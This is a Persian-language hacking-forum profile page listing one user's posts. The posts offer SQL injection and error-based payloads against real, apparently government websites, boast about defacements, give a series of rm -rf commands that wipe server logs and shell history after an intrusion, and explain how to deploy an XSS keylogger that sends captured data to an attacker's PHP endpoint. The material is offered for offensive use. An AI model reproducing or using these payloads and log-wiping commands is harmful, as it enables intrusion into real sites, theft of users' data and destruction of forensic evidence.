رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

k.shadow

کاربر رسمی
 نمایش پروفایل  مشاهده فعالیت های این کاربر

  • ارسال ها

    158

  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    3

 نوع محتوا 

تمامی موارد ارسال شده توسط k.shadow

  1. k.shadow

    تارگت های Sql Injection

    k.shadow پاسخی برای C0d3!Nj3ct!0n ارسال کرد در موضوع : تارگت های تمرینی

    درودی دوباره این نکته داشت جنبه اموزشی هست
  2. k.shadow
    درود کسی جواب نداد راحت بودا bypass.part1.rar bypass.part2.rar استقبال خوب هست ممنون
  3. k.shadow
    [Hidden Content]
  4. k.shadow

    تارگت های Sql Injection

    k.shadow پاسخی برای C0d3!Nj3ct!0n ارسال کرد در موضوع : تارگت های تمرینی

    تاپیک به این خوبی خوابیده ها ... این تگ کد های php چیه ؟؟
  5. k.shadow
    سلام و درود خدمت تمامی عزیزان گارد ایران بر طبق هماهنگی های به عمل امده تصمیم بر این شد که این تاپیک رو در انجمن بزنم همونطور که میدونید sql injection یک باگ بسیار بسیار گسترده است و هرچه در بارش بگیم کم گفتیم که برای خودش به چند بخش تقسیم میشه و هر یک از بخش ها به بخش های دیگر و.... قبلا هم یک تاپیک اماده کرده بودم به نام sql injection using creative pro یا همون خلاقیت در sql injection موضوع اون تاپیک با این یکی کاملا فرق میکنه اون در باره روش های خلاقانه بایپس در sqli بود ولی این در باره تمامی روش های حرفه ای بایپس هست چون این احتمال رو میدم تا الان همه بایپس های معمول sql injection رو بلدن من تصمیم گرفتم برای جذابیت بیشتر تاپیک یک حالت مسابقه ای بزارم به این صورت که کاربران بر طبق قوانین انجمن و مسابقه درش شرکت کنند و همچنین جواب هارو با عنوان [answer] برای من بفرستند خوب و اما جایزه پکیج کامل از بهترین های crypter و decrypter که تابحال منتشر شده تحت ویندوز و به این صورت هست که من قبل از هر اموزش تارگت رو میدم بعد از یک الی دوروز جواب رو میدم چون فعلا 4 تا اموزش هست پس پک رو به 4 قسمت تقسیم کردم هربار به برنده قسمت داده میشه پیشنهاد میکنم قبل از مطالعه تاپیک از اموزش های انجمن در رابطه با sql injection استفاده کنید خوب تارگت اول رو قرار میدم تارگت base_64 هست فقط با روش union based بزنید چون نکتش تو null هست تو ارور بیس راحت میشه زد ما اینجا فقط union میخوایم پیروز باشید ....
  6. k.shadow
    درود ببینید چندین راه داره استفاده از distinct خیلی جا ها کمک میکنه 1 بایپس به روش های معمول 2 اینجکت در نقطه دیگه ای از تارگت 3 استفاده از روش قدیمیه اینجکت کردن 4 استفاده از روش post 5 xpath injection ولی مهم ترین روش نال کردن هست and 0 پیروز باشید ...
  7. k.shadow
    درود امروز اموزش xpath injection رو براتون اماده کردم کلا خیلی کارایی داره چون بعضی از سایت ها اطلاعات مهم رو توسط xml ذخیره میکنند و همچنین برای بایپس برای این کار شما اگه یکم فقط یکم هم با xml اشنا باشین کافیه تارگت برای xpatch انواع بسیار زیادی داره چون بعضی از سایتا خیلی بازی در اوردن اگه به همچین تارگتی برخوردین بدین بررسی کنم استقبال کمه ها دوستان .... xpath.part1.rar xpath.part2.rar سوالی بود در خدمتم
  8. k.shadow
    درود ببیند دیگه کشک که نیست هر سایت .ir یا .com رو هک کنه اگر نه دیگه تا الان سایتی بالا نمیومد بهش بگید خیلی گندهس بره اینو هک کنه [Hidden Content] یا .com : [Hidden Content] . بعدشم تو بخش خودش سوالات رو بپرسید پیروز باشید ..........
  9. k.shadow
    درود [Hidden Content] از صبح تا حالا هرچی سایت هک کردم تو aljyyosh هم گذاشتم اسم انجمن بیاد بالا [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content]
  10. k.shadow
    اینم یکی دیگه [Hidden Content]
  11. k.shadow
    درود [Hidden Content]
  12. k.shadow
    تارگت به راحتی توسط xpath injection اینجکت میشه [Hidden Content] and extractvalue(rand(),concat(0x7e,(select @@version))) تیبل نیم ها [Hidden Content] and extractvalue(rand(),concat(0x7e,(select table_name from information_schema.tables limit 0,1)))
  13. k.shadow
    درود mass defens زدم ولی دوتا از سایتاش قبلا هک شده بود [Hidden Content] [Hidden Content]
  14. k.shadow

    شل های آماده جهت تمرین

    k.shadow پاسخی برای RT3N ارسال کرد در موضوع : تارگت های تمرینی

    درود راحت میشه روت شد کار من که باهش تموم شد برای کرک میخواستمش خدمت شما [Hidden Content]
  15. k.shadow

    تارگت های Sql Injection

    k.shadow پاسخی برای C0d3!Nj3ct!0n ارسال کرد در موضوع : تارگت های تمرینی

    درود گاور منت هست بعید میدونم دیفینس شده باشه [Hidden Content]- [Hidden Content],2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20-'>[Hidden Content],2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20- [Hidden Content],2,/*!50000concat*/(user('>[Hidden Content],2,/*!50000concat*/(user(),0x3c62723e,database(),0x3c62723e,version(),0x3c62723e,@@version_compile_os,0x3c62723e,@@datadir,0x3c62723e,@@basedir,0x3c62723e,@@version_comment,0x3c62723e,@@version_compile_machine,0x3c62723e,@@basedir,0x3c62723e,@@tmpdir,0x3c62723e,@@hostname),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20- گفتم یکم حرفه ای این تیکه اخرو اینجکت کنم :دی [Hidden Content],2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -
  16. k.shadow
    ببینید راه که کلا برای زدن یک سایت زیاد هست بدون ادمین پیج از باگ های مختلفی مانند rce/lfi/rfi/rfu/bof/sof/cpanel ..... اگه فقط باگ sql منظورتون هست بله بازم راه هست شما اگه دستورات sql رو بلد باشین load_file INPUT OUTFILE INSERT UPDATE ...... معمولا هم اگه تارگت فیک نباشه حتما میخوره حتی با باگ sql پیروز باشید ........
  17. k.shadow
    درود ببینید این ارور رو میشه از طریق بایپسهای عادی بایپس کرد اگه نشد از قسمت های دیگه سایت خیلی ساده توضیح بدم : 1_ بایپس عادی 2_ اگه باگ سایتتون مثلا این قسمتش باشه news.php?id= شما برید یک قسمت دیگه مثلا: index.php?id= 3_ارور بیس همیشه اینارو بایپس میکنه و همینطور تایم بیس ولی اگه یونیون منظورتون هست بایپس نشد تارگت رو بدید بررسی کنیم پیروز باشید .......
  18. k.shadow
    سلام و درود خدمت تمامی اعضای گارد ایران امروز براتون اموزش پاک کردن لاگ های روی سرور رو اماده کردم خیلی وقت ها شده به یک جا نفوذ کردید و نمیخواید ردپایی از شما به جا بمونه فقط کافی هست چند تا دستور ریموو رو ران کنید البته اینو بگم که رو فایروال بازهم لاگ میندازه یا حتی روی سوویچ و... اگه استقبال خوب باشه اموزش پاک کردن لاگ های فایروال رو هم میزارم من به سرور روت نبودم برای همین چند تا از دستور هارو نتونستم ران کنم چون لوکال روت 2.3 2014 پیدا نکردم دستورات : rm -rf /tmp/logs rm -rf $HISTFILE rm -rf /root/.ksh_history rm -rf /root/.bash_history rm -rf /root/.ksh_history rm -rf /root/.bash_logout rm -rf /usr/local/apache/logs rm -rf /usr/local/apache/log rm -rf /var/apache/logs rm -rf /var/apache/log rm -rf /var/run/utmp rm -rf /var/logs rm -rf /var/log rm -rf /var/adm rm -rf /etc/wtmp rm -rf /etc/utmp find / -name *.bash_history -exec rm -rf {} \; find / -name *.bash_logout -exec rm -rf {} \; find / -name "log*" -exec rm -rf {} \; find / -name *.log -exec rm -rf {} \; delet logs.rar پیروز باشید ..........
  19. k.shadow
    درود ممنون از پاسخ مفید شما خوب بله مشکل از طرف مدیرهست ولی بخوایم اینجکت کنیم باید راهی برای بایپس باشه ؟؟ نه ؟؟ راهش استفاده از FOR XML PATCH('') هست و تیبل ها بدون هیچ اروری برگردونده میشن ولی من دنبال mssql error based نبودم چون با یک FOR XML PATH('') میشه تیبل هارو کشید بیرون یا حتی با استفاده از err_dios (تو sql server 2014 نمیشه ) میخواستم ببینم راهی هست تو کد های aspx بدون XPATH دیتا رو بکشم بیرون از دیشب دارم روش کار میکنم به این نتیجه رسیدم تنها راه error based هست باز هم ممنون ...
  20. k.shadow
    درود دوستان من یک سوالی برام پیش اومده چون خیلی جاها وقتی میخوام mssqli اینجکت کنم با مشخصات زیر Microsoft SQL Server 2014 - 12.0.2000.8 (X64) Windows NT 6.3 <X64 IIs 10 Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.6.1055.0 با این ارور رو به رو میشم Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression.چون سایت ها string نمیتونن برگردونن باید از convert(int,(select استفاده و وقتی که top1 یا همون تیبل اول رو سلکت میکنم ارور نمیده به این صورت 'or 1=convert(int,(select top 1 table_name from information_schema.tables))-- هیچ اروری نمیده و تیبل نیم تو ارور بعدی لود میشه ولی وقتی بخوام کل تیبل هارو اینجکت کنم خیلی وقتا این ارور رو میده را هی برای بایپس هست ؟؟ (البته بجز mssql injection error based )
  21. k.shadow
    درود ببینید من که گفتم تو امضام هست تو قسمت ریختن اسکریپت کیلاگر توسط باگ xss بازم براتون اپلود کردم Files.rar طرز کار هم میشه به این صورت که شما ابتدا فایل های klog.php logs.txt رو اپلود کنید بعد داخل فایل klog.js به جای [Hidden Content] ادرس klog.php خودتون رو بزنید بعد klog,js رو هم اپلود کنید بعد میتونید داخل کد های php خودتون ازش استفاده کنید <script src=""></script> داخل "" ادرس klog.js خوتونو بزنید برای اسکرین شات هم من تا به حال نتونستم کدی بنویسم که این کار رو تحت وب بکنه (البته با c# میشه منظورم با java script هست )
  22. k.shadow
    درود ضمن تبریک عید فطر امید وارم خوب و سلامت باشید یک اموزش PRIV8 براتون اماده کردم در باره کرک md5 به صورت دستی پرل رو سیستمم نصب نبود رو کالی اموزش دادم مشکلی بود در خدمتم ابزار استفاه شده رو هم همراه فیلم پیوست کردم و یک لیست از سایتهای کرک md5 براتون گذاشتم لذت ببرید md5.rar تشکر فراموش نشه
  23. k.shadow
    درود ببینید من نمیگم باور ندارم که ایپی بدست بیارید اخه ایپی داینامیک چیکار میشه باهش کرد ؟؟ شما اومدید یک صفحه کد php نوشتید که فقط ای پی بگیره !!! :huh: در صورتی که با نصف صفحه کد هم میتونید کارتون رو را بندازید اونم تازه اگه هدف بره و یک صفحه خالی رو باز کنه بازم نظر خودتون ولی شما میتونید کیلاگر رو بردارید و این کد هارو بهش اضافه کنید کلا یک صفحه کد php شما نصف صفحه هم نمیشه بعد به یک post.php وصلش کنید همه رو لاگ کنه یوزر ایجنت و پلت فورم : دستور navigator رو برای همین مواقع ساختن :D <script> //اطلاعات بروزر var name= navigator.appCodeName; var version= navigator.appVersion; var agent=navigator.userAgent; var platform=navigator.platform; //اطلاعات کاربر document.getElementById("name").innerHTML=name; document.getElementById("version").innerHTML=version; document.getElementById("platform").innerHTML=platform; document.getElementById("agent").innerHTML=agent; </script> و اکثز جاها برای ایپی از این کد استفاده میکنن <script type="text/javascript"> window.onload = function () { var script = document.createElement("script"); script.type = "text/javascript"; script.src = "[Hidden Content]"; document.getElementsByTagName("head")[0].appendChild(script); }; function DisplayIP(response) { document.getElementById("ipaddress").innerHTML = "Your IP Address is " + response.ip; } </script> بازم نظر خودتون اسکرین شات هم با جاوا اسکریپت تا حالا نتونستم بنویسم ولی با c# میشه
  24. k.shadow

    در خواست کرک هش

    k.shadow پاسخی برای saher ارسال کرد در موضوع : مقالات و آموزشهای کرک

    درود نوع هش به احتمال زیاد md5 یا md4 هست اگر از الگوریتم اینکود کردن استاندارد استفاده کنه ببینید کلا md5 تنها راه دیکد کردنش کرک هست چون شما از 1 میتونید به c4ca4238a0b923820dcc509a6f75849b برسید ولی از c4ca4238a0b923820dcc509a6f75849b نمیتونید به 1 برسید پس تنها راه کرک کردن هست اگر دیکچنری سایت های انلاین نتونسته پس باید دستی کرک کنید
  25. k.shadow
    درود من یک چیزی رو که نفهمیدم این الان کیلاگره ؟؟؟ :huh: تا جایی که من فهمیدم هیچ کاری از کارایی که کیلاگر میکنه رو انجام نمیده فقط اطلاعات عادی مثل نام مرورگرو و یوزر ایجنت وپلت فورم رو درمیاره که باید تارگت رو مجبور کنید بره به این پیجتون سربزنه !!! کیلاگر باید سمت کلاینت باشه یعنی بره رو مرورگر تارگت ها ران شه php زبان برنامه نویسی سمت سرور هست شما باید از زبان های برنامه نویسی سمت کلاینت استفاده کنید مثل java script vb script ...... و همچنین اگر میخواید که کیلاگر رو سیستم تارگت ران شه باید برید سراغ ویروس نویسی یا اسکریپت (اکثر مرور گرا جلوی اینجور چیزارو میگیرن) در ضمن از کیلاگر های اماده استفاده نکنید چون نمیتونید بفهمید با دیتا ها چیکار میکنه نمونه ساده از کیلاگر رو من نوشتم به تاپیک ریختن اسکریپت کیلاگر باباگ xss سربزنید تو امضام هست پیروز باشید
×
×
  • ایجاد مورد جدید...